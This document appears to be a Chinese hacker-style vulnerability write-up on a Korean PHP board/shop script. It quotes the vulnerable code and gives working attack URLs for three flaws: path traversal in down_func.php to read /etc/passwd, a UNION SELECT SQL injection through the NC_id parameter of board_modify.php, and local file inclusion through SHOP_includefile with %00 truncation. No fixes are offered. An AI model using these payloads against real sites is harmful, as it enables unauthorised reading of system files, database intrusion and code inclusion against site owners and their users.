一、下载漏洞

看down_func.php代码

 

  1. <? 
  2. if ( strstr($HTTP_USER_AGENT,"MSIE 5.5")) { 
  3.     header("Content-Type: doesn/matterrn"); 
  4.     header("Content-Disposition: filename=$dnfile"); 
  5.     header("Content-Transfer-Encoding: binaryrn"); 
  6. else { 
  7.   Header("Content-Disposition: p_w_upload; filename=$dnfile"); 
  8.   Header("Content-type: file/unknown"); 
  9.   Header("Content-Length: ".(string)(filesize("$file"))); 
  10.   Header("Content-Description: PHP3 Generated Data"); 
  11.   Header("Pragma: no-cache"); 
  12.   Header("Expires: 0"); 
  13. if(is_file("$file")){ 
  14.     $fp = fopen("$file","r"); 
  15.     if (!fpassthru($fp)){fclose($fp); 
  16.     } 
  17. }else
  18.     echo "颇老捞 绝绢夸~~"
  19. ?> 

 

未做任何过滤 直接down_fun.php?file=../../../../../../../etc/passwd&dnfile=/etc/passwd

二、注入漏洞

还是看代码,board_modify.php

 

 

  1.     include_once "inc/common.php"
  2.     include "$skin_dir/nc_css.php"
  3.  
  4. $nquery = "select tb.link1,tb.link2,tb.name,tb.passwd, tb.email,tb.html_yn, tb.head,tb.wdate,tb.ip,tb.fileup1, tb.userfile1,tb.fileup2, tb.userfile2, tb.click_hit, tb.mark_hit, tt.content,tb.view_secret from NC_bbs_".$NC_id." tb, NC_text_".$NC_id." tt where tb.num='$TB_id' and tt.index1='$TB_id'"//$NC_id未做过滤哦 
  5. $nresult = mysql_query($nquery); 
  6. $md_row = mysql_fetch_object($nresult);
  1.  

board_modify.php?TB_id=8&NC_id=4  tb, NC_text_4 tt where tb.num=8 and tt.index1=8 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from  --

三、本地包含

auth_user.php文件

 

  1. <? 
  2. include_once("$SHOP_includefile/login_session_check.php");      // 雀盔肺弊牢 眉农 窃荐颇老 
  3.  
  4. if(LOGIN_CHECK()==true) { 
  5.     $grade_array = explode('|'base64_decode($_SESSION['k2comGRADE']) );   // 2005.06.22 眠啊 
  6.     $grade_my = $grade_array[0]; 
  7. }else
  8.     $grade_my = 0;          // 厚雀盔老 版快 

 

board_inc/auth_user.php?SHOP_includefile=xx.php%00

如果命好能截断的话,呵呵

 

可惜没上传漏洞 :)